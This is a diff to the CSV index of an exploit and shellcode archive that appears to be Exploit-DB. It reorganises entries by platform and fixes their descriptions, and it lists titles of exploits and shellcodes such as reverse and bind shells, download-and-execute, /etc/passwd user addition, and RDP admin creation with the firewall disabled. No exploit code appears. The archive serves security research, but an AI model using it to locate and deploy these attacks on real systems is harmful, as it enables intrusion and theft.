 48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows,
-48314,exploits/windows/local/48314.py,"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)",2020-04-13,boku,local,windows,
+48314,exploits/windows_x86/local/48314.py,"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)",2020-04-13,boku,local,windows_x86,
 48317,exploits/windows/local/48317.py,"B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)",2020-04-14,"Andy Bowden",local,windows,
 48329,exploits/windows/local/48329.py,"BlazeDVD 7.0.2 - Buffer Overflow (SEH)",2020-04-15,areyou1or0,local,windows,
 48337,exploits/macos/local/48337.rb,"VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)",2020-04-16,Metasploit,local,macos,
@ -11084,7 +11084,7 @@ id,file,description,date,author,type,platform,port
 48346,exploits/windows/local/48346.py,"Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH)",2020-04-20,boku,local,windows,
 48350,exploits/windows/local/48350.py,"Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))",2020-04-20,Cervoise,local,windows,
 48351,exploits/windows/local/48351.py,"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)",2020-04-20,bzyo,local,windows,
-48352,exploits/windows/local/48352.txt,"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path",2020-04-20,boku,local,windows,
+48352,exploits/windows_x86/local/48352.txt,"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path",2020-04-20,boku,local,windows_x86,
 48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris,
 48364,exploits/windows/local/48364.py,"RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)",2020-04-22,"Felipe Winsnes",local,windows,
 48378,exploits/windows/local/48378.txt,"Popcorn Time 6.2 - 'Update service' Unquoted Service Path",2020-04-24,"Uriel Yochpaz",local,windows,
@ -17606,7 +17606,7 @@ id,file,description,date,author,type,platform,port
 43411,exploits/windows/remote/43411.rb,"HP Mercury LoadRunner Agent magentproc.exe - Remote Command Execution (Metasploit)",2018-01-01,Metasploit,remote,windows,54345
 43412,exploits/unix/remote/43412.rb,"Cambium ePMP1000 - 'ping' Shell via Command Injection (Metasploit)",2018-01-01,Metasploit,remote,unix,
 43413,exploits/cgi/remote/43413.rb,"Cambium ePMP1000 - 'get_chart' Shell via Command Injection (Metasploit)",2018-01-01,Metasploit,remote,cgi,
-44275,exploits/windows/remote/44275.txt,"DEWESoft X3 SP1 (64-bit) - Remote Command Execution",2018-03-12,hyp3rlinx,remote,windows,
+44275,exploits/windows_x86-64/remote/44275.txt,"DEWESoft X3 SP1 (x64) - Remote Command Execution",2018-03-12,hyp3rlinx,remote,windows_x86-64,
 43428,exploits/hardware/remote/43428.py,"Iopsys Router - 'dhcp' Remote Code Execution",2017-12-23,neonsea,remote,hardware,
 43429,exploits/hardware/remote/43429.rb,"Linksys WVBR0-25 - User-Agent Command Execution (Metasploit)",2018-01-04,Metasploit,remote,hardware,
 43430,exploits/linux/remote/43430.rb,"Xplico - Remote Code Execution (Metasploit)",2018-01-04,"Mehmet Ince",remote,linux,9876
@ -18222,6 +18222,7 @@ id,file,description,date,author,type,platform,port
 48587,exploits/multiple/remote/48587.py,"SOS JobScheduler 1.13.3 - Stored Password Decryption",2020-06-15,"Sander Ubink",remote,multiple,
 48620,exploits/hardware/remote/48620.txt,"mySCADA myPRO 7 - Hardcoded Credentials",2020-06-25,"Emre ÖVÜNÇ",remote,hardware,
 48650,exploits/xml/remote/48650.txt,"Microsoft Windows mshta.exe 2019 - XML External Entity Injection",2020-07-07,hyp3rlinx,remote,xml,
 48657,exploits/windows/remote/48657.py,"CompleteFTP Professional 12.1.3 - Remote Code Execution",2020-07-09,1F98D,remote,windows,
 48661,exploits/linux/remote/48661.sh,"Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution",2020-07-10,SpicyItalian,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
@ -42650,6 +42651,7 @@ id,file,description,date,author,type,platform,port
 48198,exploits/php/webapps/48198.txt,"Joomla! 3.9.0 < 3.9.7 - CSV Injection",2020-03-11,i4bdullah,webapps,php,
 48199,exploits/php/webapps/48199.txt,"PlaySMS 1.4.3 - Template Injection / Remote Code Execution",2020-03-11,"Touhid M.Shaikh",webapps,php,
 48200,exploits/php/webapps/48200.txt,"Wing FTP Server - Authenticated CSRF (Delete Admin)",2020-03-11,"Dhiraj Mishra",webapps,php,
 48201,exploits/php/webapps/48201.py,"TeamCity Agent XML-RPC 10.0 - Remote Code Execution",2020-03-11,1F98D,webapps,php,
 48202,exploits/php/webapps/48202.txt,"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection",2020-03-12,"Milad karimi",webapps,php,
 48203,exploits/java/webapps/48203.txt,"WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure",2020-03-12,"RedTeam Pentesting GmbH",webapps,java,
 48204,exploits/php/webapps/48204.txt,"WordPress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection",2020-03-12,"Daniel Monzón",webapps,php,
@ -42961,3 +42963,4 @@ id,file,description,date,author,type,platform,port
 48714,exploits/php/webapps/48714.txt,"pfSense 2.4.4-p3 - Cross-Site Request Forgery",2020-07-26,ghost_fh,webapps,php,
 48715,exploits/php/webapps/48715.txt,"Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting",2020-07-26,"Peter Blue",webapps,php,
 48716,exploits/ruby/webapps/48716.rb,"Rails 5.0.1 - Remote Code Execution",2020-07-26,"Lucas Amorim",webapps,ruby,
 48720,exploits/php/webapps/48720.py,"eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution",2020-07-27,"Berk KIRAS",webapps,php,
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@ -18,7 +18,7 @@ id,file,description,date,author,type,platform
 13257,shellcodes/bsdi_x86/13257.c,"BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86
 13258,shellcodes/bsdi_x86/13258.c,"BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86
 13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
-13261,shellcodes/freebsd/13261.c,"FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd
+13261,shellcodes/freebsd/13261.c,"FreeBSD x86/x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd
 13262,shellcodes/freebsd_x86/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,shellcode,freebsd_x86
 13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86
 13264,shellcodes/freebsd_x86/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,shellcode,freebsd_x86
@ -926,11 +926,11 @@ id,file,description,date,author,type,platform
 45669,shellcodes/linux_x86/45669.c,"Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes",2018-10-24,"Goutham Madhwaraj",shellcode,linux_x86
 45743,shellcodes/windows_x86-64/45743.c,"Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator)",2018-10-30,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
 45821,shellcodes/linux_x86/45821.c,"Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)",2018-11-13,"Javier Tello",shellcode,linux_x86
-45940,shellcodes/linux/45940.nasm,"Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)",2018-12-04,Nelis,shellcode,linux
+45940,shellcodes/linux_x86/45940.nasm,"Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)",2018-12-04,Nelis,shellcode,linux_x86
 45943,shellcodes/linux_x86-64/45943.c,"Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)",2018-12-04,"Kağan Çapar",shellcode,linux_x86-64
 45980,shellcodes/linux_x86/45980.c,"Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86
 46007,shellcodes/linux_x86-64/46007.c,"Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)",2018-12-19,"Kağan Çapar",shellcode,linux_x86-64
-46039,shellcodes/linux/46039.c,"Linux/x86 - Kill All Processes Shellcode (14 bytes)",2018-12-24,strider,shellcode,linux
+46039,shellcodes/linux_x86/46039.c,"Linux/x86 - Kill All Processes Shellcode (14 bytes)",2018-12-24,strider,shellcode,linux_x86
 46103,shellcodes/linux_x86/46103.c,"Linux/x86 - execve(/bin/sh -c) + wget (http://127.0.0.1:8080/evilfile) + chmod 777 + execute Shellcode (119 bytes)",2019-01-09,strider,shellcode,linux_x86
 46123,shellcodes/generator/46123.py,"Windows/x86 - Download With TFTP And Execute Shellcode (51-60 bytes) (Generator)",2019-01-11,"Semen Alexandrovich Lyhin",shellcode,generator
 46166,shellcodes/linux_x86/46166.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2019-01-15,"Joao Batista",shellcode,linux_x86
@ -1004,24 +1004,24 @@ id,file,description,date,author,type,platform
 47396,shellcodes/linux_x86/47396.c,"Linux/x86 - Bind TCP (port 43690) Null-Free Shellcode (53 Bytes)",2019-09-17,"Daniel Ortiz",shellcode,linux_x86
 47461,shellcodes/linux_x86/47461.c,"Linux/x86 - NOT + XOR-N + Random Encoded /bin/sh Shellcode (132 bytes)",2019-10-04,bolonobolo,shellcode,linux_x86
 47473,shellcodes/arm/47473.c,"Linux/ARM - Fork Bomb Shellcode (20 bytes)",2019-10-08,CJHackerz,shellcode,arm
-47481,shellcodes/linux/47481.c,"Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)",2019-10-10,VL43CK,shellcode,linux
+47481,shellcodes/linux_x86/47481.c,"Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)",2019-10-10,VL43CK,shellcode,linux_x86
-47511,shellcodes/linux/47511.c,"Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)",2019-10-16,bolonobolo,shellcode,linux
+47511,shellcodes/linux_x86/47511.c,"Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86
-47513,shellcodes/linux/47513.c,"Linux/x86 - execve /bin/sh Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux
+47513,shellcodes/linux_x86/47513.c,"Linux/x86 - execve /bin/sh Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86
-47514,shellcodes/linux/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux
+47514,shellcodes/linux_x86/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86
-47530,shellcodes/linux/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux
+47530,shellcodes/linux_x86/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux_x86
-47564,shellcodes/linux/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux
+47564,shellcodes/linux_x86/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux_x86
 47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64
-47877,shellcodes/linux/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux
+47877,shellcodes/linux_x86/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux_x86
-47890,shellcodes/linux/47890.c,"Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux
+47890,shellcodes/linux_x86/47890.c,"Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux_x86
 47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows
-47980,shellcodes/windows/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows
+47980,shellcodes/windows_x86/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows_x86
-48032,shellcodes/linux/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux
+48032,shellcodes/linux_x86/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux_x86
 48116,shellcodes/windows_x86/48116.c,"Windows/x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86
-48229,shellcodes/windows/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows
+48229,shellcodes/windows_x86-64/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows_x86-64
-48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux
+48243,shellcodes/linux_x86/48243.txt,"Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux_x86
 48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64
-48355,shellcodes/windows/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows
+48355,shellcodes/windows_x86/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows_x86
-48379,shellcodes/linux/48379.c,"Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux
+48379,shellcodes/linux_x86-64/48379.c,"Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux_x86-64
 48585,shellcodes/arm/48585.c,"Linux/ARM - execve /bin/dash Shellcode (32 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm
 48586,shellcodes/arm/48586.c,"Linux/ARM - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm
 48592,shellcodes/linux_x86/48592.c,"Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes)",2020-06-17,"Xenofon Vassilakopoulos",shellcode,linux_x86
--- a/shellcodes/linux_x86-64/48379.c
+++ b/shellcodes/linux_x86-64/48379.c
--- a/shellcodes/linux_x86/45940.nasm
+++ b/shellcodes/linux_x86/45940.nasm
--- a/shellcodes/linux_x86/46039.c
+++ b/shellcodes/linux_x86/46039.c
--- a/shellcodes/linux_x86/47481.c
+++ b/shellcodes/linux_x86/47481.c
--- a/shellcodes/linux_x86/47511.c
+++ b/shellcodes/linux_x86/47511.c
--- a/shellcodes/linux_x86/47513.c
+++ b/shellcodes/linux_x86/47513.c
--- a/shellcodes/linux_x86/47514.c
+++ b/shellcodes/linux_x86/47514.c
--- a/shellcodes/linux_x86/47530.txt
+++ b/shellcodes/linux_x86/47530.txt
--- a/shellcodes/linux_x86/47564.py
+++ b/shellcodes/linux_x86/47564.py
--- a/shellcodes/linux_x86/47877.c
+++ b/shellcodes/linux_x86/47877.c
--- a/shellcodes/linux_x86/47890.c
+++ b/shellcodes/linux_x86/47890.c
--- a/shellcodes/linux_x86/48032.py
+++ b/shellcodes/linux_x86/48032.py
--- a/shellcodes/linux_x86/48243.txt
+++ b/shellcodes/linux_x86/48243.txt
--- a/shellcodes/windows_x86-64/48229.txt
+++ b/shellcodes/windows_x86-64/48229.txt
--- a/shellcodes/windows_x86/47980.txt
+++ b/shellcodes/windows_x86/47980.txt
--- a/shellcodes/windows_x86/48355.c
+++ b/shellcodes/windows_x86/48355.c